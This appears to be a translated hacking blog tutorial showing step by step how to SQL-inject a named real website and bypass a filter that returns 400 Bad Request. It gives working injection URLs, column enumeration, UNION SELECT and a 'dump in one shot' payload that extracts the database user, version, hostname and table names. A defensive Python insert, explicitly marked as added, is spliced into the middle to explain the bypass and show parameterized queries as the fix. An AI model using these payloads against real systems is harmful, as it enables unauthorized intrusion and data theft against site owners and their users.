How to Do SQL Injection and Bypass a 400 Bad Request


Assalamu'alaikum, back again with me, Haidar Ganss, eak.
Site: http://www.ultramaryna.pl/tekst.php?id=342


Ingredients?

- DIOS

- Coffee

- Cigarettes

- Your girl (if you're single, skip it)


First, we put a single quote after the parameter:

http://www.ultramaryna.pl/tekst.php?id=342'

An error means it's vulnerable.

It errors, so next we balance it with --+-:

http://www.ultramaryna.pl/tekst.php?id=342'--+-

And the page comes back as usual/normal.




Next, ORDER BY:

http://www.ultramaryna.pl/tekst.php?id=342' order by 1--+-

And boom, turns out it's a 400 Bad Request ;(

So how do we bypass it?

Simple enough, with %23%0a:

http://www.ultramaryna.pl/tekst.php?id=342' %23%0aorder %23%0aby 1--+-

and boom, it works.
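Why that works: %23%0a decodes to a `#` followed by a newline, which MySQL treats as a comment that ends at the newline, so the database still reads `order by` while a filter that matches the literal keyword string does not. The example below is added here, not code from the original post; it shows a constructed keyword rule being defeated by that trick, the same rule run on a comment-stripped, URL-decoded value, and the root-cause fix (binding the parameter) against a constructed in-memory SQLite table.

```python
import re
import sqlite3
import urllib.parse

# The two MySQL comment forms the post leans on: '#' to end of line, and /* ... */ blocks.
MYSQL_COMMENT = re.compile(r"#[^\n]*\n?|/\*.*?\*/", re.S)
# Constructed keyword rule standing in for whatever the 400 response is keyed on.
KEYWORD_RULE = re.compile(r"\b(union\s+select|order\s+by)\b", re.I)


def naive_rule(raw_param: str) -> bool:
    """Rule applied to the URL-decoded value as received; '#' plus newline between the words defeats it."""
    return bool(KEYWORD_RULE.search(urllib.parse.unquote_plus(raw_param)))


def normalize(raw_param: str) -> str:
    """Decode, strip MySQL comments, collapse whitespace: roughly what the SQL parser effectively sees."""
    decoded = urllib.parse.unquote_plus(raw_param)
    no_comments = MYSQL_COMMENT.sub(" ", decoded)
    return re.sub(r"\s+", " ", no_comments).strip()


def hardened_rule(raw_param: str) -> bool:
    """Same keyword rule, but run on the normalized value, so the comment trick no longer hides it."""
    return bool(KEYWORD_RULE.search(normalize(raw_param)))


def lookup_parameterized(raw_param: str) -> list:
    """The root-cause fix: bind the value instead of concatenating it (constructed in-memory table)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, body TEXT)")
    conn.execute("INSERT INTO articles VALUES (342, 'sample article')")
    rows = conn.execute(
        "SELECT body FROM articles WHERE id = ?",
        (urllib.parse.unquote_plus(raw_param),),
    ).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    plain = "342' order by 1--+-"
    tricked = "342' %23%0aorder %23%0aby 1--+-"
    print(naive_rule(plain), naive_rule(tricked))      # True False
    print(hardened_rule(tricked), normalize(tricked))  # True 342' order by 1-- -
    print(lookup_parameterized("342"), lookup_parameterized(tricked))  # [('sample article',)] []
```

Keyword matching after normalization is only a detection aid; the bound parameter is what actually stops the payload from changing the query.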

Next, keep going with ORDER BY:

http://www.ultramaryna.pl/tekst.php?id=342' order by 10--+- no error

http://www.ultramaryna.pl/tekst.php?id=342' order by 11--+- no error

http://www.ultramaryna.pl/tekst.php?id=342' order by 12--+- no error

http://www.ultramaryna.pl/tekst.php?id=342' order by 13--+- no error

http://www.ultramaryna.pl/tekst.php?id=342' order by 20--+- error

It errors at 20, so try going down to 19, and it turns out there's no error:

http://www.ultramaryna.pl/tekst.php?id=342' order by 19--+- no error


Next, UNION SELECT with the 19 columns we just found:

http://www.ultramaryna.pl/tekst.php?id=-342 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-

And it turns out there's no 400 Bad Request, and the "lottery numbers" (the column numbers) show up.

The reflected number is 2.




So we try putting the DIOS into column 2.




And it turns out to be a 400 Bad Request ;(

So let's look at this carefully:
http://www.ultramaryna.pl/tekst.php?id=342'AND 0 UNION SELECT 1,2,concat('Kissed By Fake Friends','<br>','<img src =%22https://i.ibb.co/2NgfNWD/20201114-122832.jpg%22 width=%2240%%22>','<br>',user%23kediriblackhat%0a(),'<br>',database%23%0a(),'<br>',version%23%0a(),'<br>',@@hostname,'<br>',@@port,'<br>',group_concat(table_name,'<br>')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema%23kediriblackhat%0a.%23kediriblackhat%0atables where table_schema=database%23kediriblackhat%0a()--+-

The above is the DIOS.




And wassalamu'alaikum, thank you, that's all for now.
Don't forget to subscribe to my channel, Haidar Ganss, and don't forget to share.